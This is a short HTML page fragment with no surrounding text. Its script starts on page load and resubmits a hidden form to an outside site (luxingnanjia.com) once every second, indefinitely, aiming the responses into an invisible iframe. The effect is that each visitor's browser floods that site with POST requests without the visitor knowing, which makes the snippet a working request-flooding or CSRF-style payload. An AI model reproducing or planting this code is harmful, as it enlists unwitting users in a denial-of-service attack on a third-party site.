<form name="vdefcon" id="vdefcon" target="vdefcon_frame" action="http://www.luxingnanjia.com/vehicles" method="POST">
<input name="data" value="example packet text" /><input type="submit" value="Submit" />
</form>
<iframe name="vdefcon_frame" id="vdefcon_frame"></iframe>
<script type="text/javascript">
window.onload=function(){
var limit = 1000; 
var myVar = setInterval(function(){
document.forms["vdefcon"].submit();
},limit);
}
</script>